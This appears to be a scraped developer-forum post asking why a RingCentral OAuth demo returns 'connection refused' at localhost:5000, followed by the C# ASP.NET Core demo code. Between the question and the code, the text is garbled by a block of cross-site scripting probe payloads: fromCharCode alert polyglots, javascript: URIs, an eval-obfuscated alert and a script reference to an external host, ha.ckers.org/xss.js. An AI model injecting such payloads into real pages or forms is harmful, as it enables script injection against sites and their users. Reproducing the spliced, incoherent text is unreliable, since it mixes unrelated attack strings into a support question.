Hi. I am trying to run the Authorization Flow demo.
After I enter my username and password, the browser shows a "connection refused" error. The URI in the address bar looks like the following:
http://localhost:5000/oauth2callback?code=U0pDMTFQM
with a long string for code.
Any hints as to where to go next?
'-alert(document.domain)-'&did='-alert(document.domain)-'. [5:21%11PM,%202/29/2020]%joker:%20 javascript:alert("hellox worldss") <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> PT SRC="http://ha.ckers.org/xss.js">; < <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &search=1
'-alert(document.domain)-'&did='-alert(document.domain)-'. [5:21%11PM,%202/29/2020]%joker:%20 javascript:alert("hellox worldss") <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> PT SRC="http://ha.ckers.org/xss.js">; < <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>&submit-frmGoogleWeb=Web+Search
hellox worldss
...
lol "> "> "> "> <% foo>
exp/*
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); PT SRC="
http://ha.ckers.org/xss.js">; TESTHTML5FORMACTION crosssitespt
|
I just copied the C# example from the RingCentral site. The only things I changed were the Client ID and Secret:
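using System.Linq;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;
using Microsoft.AspNetCore.Http;
using Microsoft.Extensions.DependencyInjection;
using RingCentral;
using Newtonsoft.Json;
using Microsoft.Extensions.Hosting;

namespace RCAuthFlowV2
{
    /// <summary>
    /// Minimal ASP.NET Core host that demonstrates the RingCentral OAuth 2.0
    /// authorization code flow: it shows a login link, exchanges the returned
    /// authorization code for a token, keeps the token in the server-side
    /// session and calls a few read-only API endpoints with it.
    /// </summary>
    public class Startup
    {
        // Placeholders. Real values belong in configuration or a secret store,
        // not in source control.
        private const string RINGCENTRAL_CLIENT_ID = "XXXXXXXXXX";
        private const string RINGCENTRAL_CLIENT_SECRET = "YYYYYYYYYYYYYYYYYYY";
        private const string RINGCENTRAL_SERVER_URL = "https://platform.devtest.ringcentral.com";

        // Must match the redirect URI registered for the client, and the host and
        // port this application actually listens on. A "connection refused" in the
        // browser at this URL means nothing is listening at localhost:5000.
        private const string RINGCENTRAL_REDIRECT_URL = "http://localhost:5000/oauth2callback";

        private const string SESSION_TOKEN_KEY = "rc-token";

        // Session key for the one-time OAuth "state" value that binds the
        // callback to the browser session that started the login.
        private const string SESSION_STATE_KEY = "rc-oauth-state";

        /// <summary>Registers MVC (with session-backed TempData) and session state.</summary>
        /// <param name="services">The application's service collection.</param>
        public void ConfigureServices(IServiceCollection services)
        {
            services.AddMvc().AddSessionStateTempDataProvider();
            services.AddSession();
        }

        /// <summary>Wraps an HTML fragment in a minimal document.</summary>
        /// <param name="body">Markup placed inside the body element. It is inserted
        /// as-is, so callers must HTML-encode any value they do not control.</param>
        /// <returns>The complete HTML document.</returns>
        private static string Html(string body)
        {
            return $@"<!doctype html><html><body>{body}</body></html>";
        }

        /// <summary>Creates an unpredictable hex string for use as the OAuth state value.</summary>
        /// <returns>64 hexadecimal characters taken from the system CSPRNG.</returns>
        private static string NewState()
        {
            var bytes = new byte[32];
            System.Security.Cryptography.RandomNumberGenerator.Fill(bytes);
            return System.BitConverter.ToString(bytes).Replace("-", "");
        }

        /// <summary>
        /// Builds the request pipeline: session middleware followed by a single
        /// terminal handler that implements the login, callback, API test and
        /// logout routes.
        /// </summary>
        /// <param name="app">The application builder.</param>
        /// <param name="env">The hosting environment; the developer exception page
        /// is enabled only in Development.</param>
        public void Configure(IApplicationBuilder app, IWebHostEnvironment env)
        {
            if (env.IsDevelopment())
            {
                app.UseDeveloperExceptionPage();
            }

            app.UseSession();
            app.Run(async (context) =>
            {
                var rc = new RestClient(RINGCENTRAL_CLIENT_ID, RINGCENTRAL_CLIENT_SECRET, RINGCENTRAL_SERVER_URL);
                var tokenString = context.Session.GetString(SESSION_TOKEN_KEY);
                if (tokenString != null)
                {
                    rc.token = JsonConvert.DeserializeObject<TokenInfo>(tokenString);
                }
                else if (context.Request.Path != "/oauth2callback")
                {
                    // Reuse a pending state value so that secondary requests from the
                    // same browser (for example /favicon.ico) do not invalidate the
                    // login link that was already rendered.
                    var state = context.Session.GetString(SESSION_STATE_KEY);
                    if (string.IsNullOrEmpty(state))
                    {
                        state = NewState();
                        context.Session.SetString(SESSION_STATE_KEY, state);
                    }

                    var oauthUri = rc.AuthorizeUri(RINGCENTRAL_REDIRECT_URL, state);

                    // The URI contains '&' and goes into an attribute, so it is encoded.
                    var href = System.Net.WebUtility.HtmlEncode(oauthUri);
                    await context.Response.WriteAsync(
                        Html($"<h2>RingCentral Authorization Code Flow Authentication</h2><a href=\"{href}\">Login RingCentral Account</a>"));
                    return;
                }

                switch (context.Request.Path)
                {
                    case "/":
                        await context.Response.WriteAsync(Html(@"<b><a href=""/logout"">Logout</a></b>
<h2>Call APIs</h2>
<ul>
<li><a href=""/test?api=extension"" target=""_blank"">Read Extension Info</a></li>
<li><a href=""/test?api=extension-call-log"" target=""_blank"">Read Extension Call Log</a></li>
<li><a href=""/test?api=account-call-log"" target=""_blank"">Read Account Call Log</a></li>
</ul>"));
                        break;

                    case "/oauth2callback":
                        // The state value is single-use: read it and discard it before
                        // deciding whether this callback is acceptable.
                        var expectedState = context.Session.GetString(SESSION_STATE_KEY);
                        context.Session.Remove(SESSION_STATE_KEY);
                        var returnedState = context.Request.Query["state"].FirstOrDefault();
                        var code = context.Request.Query["code"].FirstOrDefault();

                        // Reject callbacks that this session did not initiate, and
                        // callbacks without a code (the provider reports a denied or
                        // failed login without one), instead of throwing on First().
                        if (string.IsNullOrEmpty(expectedState)
                            || !string.Equals(expectedState, returnedState, System.StringComparison.Ordinal)
                            || string.IsNullOrEmpty(code))
                        {
                            context.Response.StatusCode = 400;
                            await context.Response.WriteAsync(
                                Html("<h2>Authorization failed</h2><a href=\"/\">Try again</a>"));
                            break;
                        }

                        await rc.Authorize(code, RINGCENTRAL_REDIRECT_URL);
                        context.Session.SetString(SESSION_TOKEN_KEY, JsonConvert.SerializeObject(rc.token));
                        context.Response.Redirect("/");
                        break;

                    case "/test":
                        // FirstOrDefault: a request without ?api= yields an empty
                        // result instead of an unhandled exception.
                        var api = context.Request.Query["api"].FirstOrDefault();
                        var result = "";
                        switch (api)
                        {
                            case "extension":
                                result = await rc.Get<string>("/restapi/v1.0/account/~/extension");
                                break;
                            case "extension-call-log":
                                result = await rc.Get<string>("/restapi/v1.0/account/~/extension/~/call-log");
                                break;
                            case "account-call-log":
                                result = await rc.Get<string>("/restapi/v1.0/account/~/call-log");
                                break;
                        }

                        // The API response is data, not markup: encode it so that
                        // values inside it (names, call-log fields) cannot inject HTML.
                        await context.Response.WriteAsync(
                            Html($"<pre>{System.Net.WebUtility.HtmlEncode(result)}</pre>"));
                        break;

                    case "/logout":
                        await rc.Revoke();
                        context.Session.Remove(SESSION_TOKEN_KEY);
                        context.Response.Redirect("/");
                        break;

                    default:
                        context.Response.StatusCode = 404;
                        break;
                }
            });
        }
    }
}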